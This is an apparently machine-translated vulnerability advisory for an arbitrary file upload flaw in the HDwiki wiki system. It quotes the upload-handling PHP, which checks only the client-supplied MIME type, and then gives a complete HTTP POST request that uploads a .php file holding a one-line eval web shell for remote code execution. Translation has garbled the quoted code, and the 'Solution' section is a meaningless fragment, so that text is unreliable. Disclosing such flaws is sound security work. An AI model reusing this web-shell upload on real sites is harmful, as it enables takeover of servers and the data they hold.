As the first Chinese Wiki system with independent intellectual property rights in China, HDwiki was officially launched by interactive online (Beijing) Technology Co., Ltd. on September 10, November 28, 2006, we strive to provide a free, easy-to-use, and powerful Wiki site building system for many Wikipedia fans at home and abroad. The launch of HDwiki fills the gaps in the Chinese Wiki website construction system
However, some upload functions in HDwiki have security vulnerabilities. You can use some data to bypass the upload restriction and ultimately control the remote site.
Detailed description:
Lib/file. class. php
Function uploadfile ($ attachment, $ target, $ maxsize = 1024, $ is_image = 1 ){
$ Result = array ('result' => false, 'msg '=> 'upload mistake ');
If ($ is_image ){
$ Attach = $ attachment;
$ Filesize = $ attach ['SIZE']/1024;
If (0 = $ filesize ){
$ Result ['msg '] =' & #19978; & #20256; & #38169; & #35823 ;';
Return $ result;
}
If (substr ($ attach ['type'], 0, 6 )! = 'Image /'){
$ Result ['msg '] =' & #26684; & #24335; & #38169; & #35823 ;';
Return $ result;
}
If ($ filesize> $ maxsize ){
$ Result ['msg '] =' & #25991; & #20214; & #36807; & #22823 ;';
Return $ result;
}
} Else {
$ Attach ['tmp _ name'] = $ attachment;
}
$ Filedir = dirname ($ target );
File: forcemkdir ($ filedir );
If (@ copy ($ attach ['tmp _ name'], $ target) | @ move_uploaded_file ($ attach ['tmp _ name'], $ target )){
No check
Triggered in attachment. php
Function douploadimg (){
$ Imgname = $ _ FILES ['photofile'] ['name'];
$ Extname = file: extname ($ imgname );
$ Destfile = $ _ ENV ['attachment']-> makepath ($ extname );
$ Arrupload = file: uploadfile ($ _ FILES ['photofile'], $ destfile );
Proof of vulnerability:
POST/hdwiki/index. php? Attachment-uploadimg HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword ,*/*
Referer: http://www.bkjia.com/
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary = --------------------------- 7db261e100f2e
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;. net clr 2.0.50727; InfoPath.2)
Host: www.2cto.com
Content-Length: 370
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Keys = 1298002704449; hd_sid = raG13H; hd_auth = 4113YBBXXB13XtdR6EXTA1Cb9BuhZMK % keys % 2F5gc6pLm9fZ % 2Bdgv68MT; hd_searchtime = 1300983373
----------------------------- 7db261e100f2e
Content-Disposition: form-data; name = "MAX_FILE_SIZE"
30000
----------------------------- 7db261e100f2e
Content-Disposition: form-data; name = "photofile"; filename = "C: \ fucker \ z. php"
Content-Type: image/image
Zzz <? Eval ($ _ REQUEST [z])?>
----------------------------- 7db261e100f2e --
Solution:
Amount